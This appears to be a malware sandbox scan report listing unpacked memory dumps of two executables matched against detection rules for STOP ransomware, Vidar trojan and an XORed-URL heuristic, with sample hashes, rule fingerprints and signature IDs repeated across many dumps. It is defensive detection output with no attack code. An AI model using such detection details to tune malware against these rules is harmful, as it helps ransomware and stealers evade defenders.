Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.build2.exe.5f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
